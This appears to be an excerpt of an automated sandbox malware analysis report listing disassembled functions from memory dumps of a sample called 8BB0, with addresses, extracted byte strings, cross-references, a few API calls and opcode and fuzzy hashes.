Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: a6c185917b69e46fb06282357ae7e20d9b847d5aa52d65766d9f9a83b35f9a8f
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 2EA1E97110C3818BE365CF29C4A07ABFBD2AFD2304F188A6ED4D987391DB748449CB56

Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0042CA02
&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757

Function 024DC99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

zJyL, xrefs: 024DCDB0
5, xrefs: 024DCB84
&=, xrefs: 024DCC7F
EF, xrefs: 024DCDD1
D@6T, xrefs: 024DCC69

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: 39cbd36af6a7907b6f7c866ed88b8d9ced97755afc36f088f25f122d1b81590b
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: FDA1F97010C3818BE365CF29C4A07ABBBD2AFD2304F188A6ED4D987391DB748549CB56

Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0042CA02
&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757

Function 024DC98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

zJyL, xrefs: 024DCDB0
5, xrefs: 024DCB84
&=, xrefs: 024DCC7F
EF, xrefs: 024DCDD1
D@6T, xrefs: 024DCC69

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: ff535f6e4ce891a8b06b0e6459c303ff4aa5d57d5fde2420a8cc2cefbb719318
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: F4A1D77110C3818EE325CF29C8A07ABFBD2AFD2304F188A5ED5D98B391DB748449CB56

Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON

Download Yara Rule

Strings

kmbj, xrefs: 00415B8C
ydij, xrefs: 00415B93
in~x, xrefs: 00415AFB
Z\, xrefs: 00415344

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: in~x$kmbj$ydij$Z\
API String ID: 0-979945983
Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

)R_X, xrefs: 0041E170
&-, xrefs: 0041E39A
zusR, xrefs: 0041E14E
[O_[, xrefs: 0041E2A8

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A

Function 024CE1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

)R_X, xrefs: 024CE3D7
&-, xrefs: 024CE601
[O_[, xrefs: 024CE50F
zusR, xrefs: 024CE3B5

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction ID: a21df0bb7dde899aac5f43d2cdf36963e08164e5bf08806c44d95ed54de2195d
Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction Fuzzy Hash: F942267460C3908FD725DF28C85076FBBE1AF86214F18866EE8E55B392D736C506CB52

Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735
1, xrefs: 0042BB59
/, xrefs: 0042B908

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796

Function 024DB75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

%(#}, xrefs: 024DB9A7
/, xrefs: 024DBB6F
/26-, xrefs: 024DB99C
1, xrefs: 024DBDC0

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction ID: 998f19369acd3ae4a442994399b2e2b35ada2bcd3e4ab811fc1cd2af1c1622cd
Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction Fuzzy Hash: 7BE1E77111D3C18BE765CF29C4617BBBBD6EF92208F19896ED0D987392DB39810AC712

Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON

Download Yara Rule

Strings

%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735
1, xrefs: 0042BB59
/, xrefs: 0042B908

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

Function 024DB763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON

Download Yara Rule

Strings

%(#}, xrefs: 024DB9A7
/, xrefs: 024DBB6F
/26-, xrefs: 024DB99C
1, xrefs: 024DBDC0

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction ID: 6351070054c0246e6e1fa122a725108731f4a337ff947edd5ecb95023134e875
Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction Fuzzy Hash: 0BE1B37151D3C18AE7758F25C4607BBBBD6EFD2208F1988AED1C987292DB39414ACB12

Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON

Download Yara Rule

Strings

D@YO, xrefs: 00418B3E
?TUV, xrefs: 00418704
"w+y, xrefs: 004185AB
^QRW, xrefs: 00418B45

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$D@YO$^QRW
API String ID: 0-2418547040
Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44

Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431887
GetSystemMetrics.USER32 ref: 00431896

Strings

, xrefs: 0043196A

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON

Download Yara Rule

Strings

3ej, xrefs: 0040D2DD
pr, xrefs: 0040D2F1
ZG, xrefs: 0040D25A
BI, xrefs: 0040D253

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: BI$ZG$3ej$pr
API String ID: 0-483502859
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Function 024BD25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON

Download Yara Rule

Strings

3ej, xrefs: 024BD544
BI, xrefs: 024BD4BA
ZG, xrefs: 024BD4C1
pr, xrefs: 024BD558

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: BI$ZG$3ej$pr
API String ID: 0-483502859
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: 07d8a16166267ddaf1c50f5ac9908c9aa89be903bcdfd70f65042fdce521e89e
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: B2A1B2B56017818FD719CF29C590A62BBF2FF96304B1995AEC4D68F766D734E802CB20

Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON

Download Yara Rule

Strings

dB, xrefs: 004264D2
67, xrefs: 0042677F
V3R5, xrefs: 00426774

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: 67$V3R5$dB
API String ID: 0-2543814982
Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A

Function 024C87DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

?TUV, xrefs: 024C896B
DX8Z, xrefs: 024C8956
"w+y, xrefs: 024C8812

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$DX8Z
API String ID: 0-3307990326
Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction ID: 9e3f2e29351f33121b07bf26f575b84b8bf1ae95633c2d236521c02d6c504c0c
Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction Fuzzy Hash: 5481FD756007128FC769CF29C890A63B7F2FF95710B29859EC8824FB65E734E841CB54

Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00419E54
I,~M, xrefs: 0041A448

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k$I,~M
API String ID: 2994545307-936430989
Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A

Function 024C99D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

,)*k, xrefs: 024CA0BB
I,~M, xrefs: 024CA6AF

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: ,)*k$I,~M
API String ID: 0-936430989
Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction ID: 3f26747ad08cbbca792645c6ccf952dcc17fded79daa1b97200da73a5e01b686
Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction Fuzzy Hash: A982F8786093506BD7948F28D880B3FBBE2EBC6714F38892DE58557391D771D842CB46

Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040DD35

Strings

PT, xrefs: 0040DF63

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT
API String ID: 3861434553-4135314810
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55

Function 024BDF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 024BDF9C

Strings

PT, xrefs: 024BE1CA

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT
API String ID: 3861434553-4135314810
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: e34b0fbf6d84a2b85abe9a7d1c6fcb2308c971b2e9bf59b8bc3688ad08dbf50a
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: 83A1F2B46087918FD726CF39C4A0AA2BFE1EF57204B58869DC4D24FB66D339D406CB25

Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 0040AB5D
de, xrefs: 0040AAF3

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787

Function 024BABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 024BADC4
de, xrefs: 024BAD5A

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: 1a762800d365188687e1949390672e45eded9f201f8c8f9ef10ceda913e4fb67
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 58D1F77164C3648BD725DF2888516EFBBE2EFC1208F18492DE8D19B391D675C506CB92

Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

@, xrefs: 0043CBF5
ihgf, xrefs: 0043CC13

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @$ihgf
API String ID: 2994545307-73152791
Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A

Function 024ECD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

ihgf, xrefs: 024ECE7A
@, xrefs: 024ECE5C

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: @$ihgf
API String ID: 0-73152791
Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction ID: 9ecd676dbe7eba4f330a7565fd96e4ed1412776b0115a0b8468e56edf1d3db07
Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction Fuzzy Hash: 474106B16043018BEB14DF28C88177BB7A6FF81319F14862ED4969B390E7359905CB92

Function 024C554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

Z\, xrefs: 024C55AB
^P, xrefs: 024C55B2

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: Z\$^P
API String ID: 0-3724859648
Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction ID: d0e97233ce6c0b2bb1f2680a284f9e526002128e2cb9440206422db3aab6030b
Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction Fuzzy Hash: B441E0B5A11600CFC719CF28C891A66B7B2FF49314B16819DD49A9F7A4E738E401CF55

Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

`rB, xrefs: 00427341
AzB, xrefs: 004275AA

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A

Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

`rB, xrefs: 00427341
AzB, xrefs: 004275AA

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A

Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON

Download Yara Rule

Strings

c$, xrefs: 00417707

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
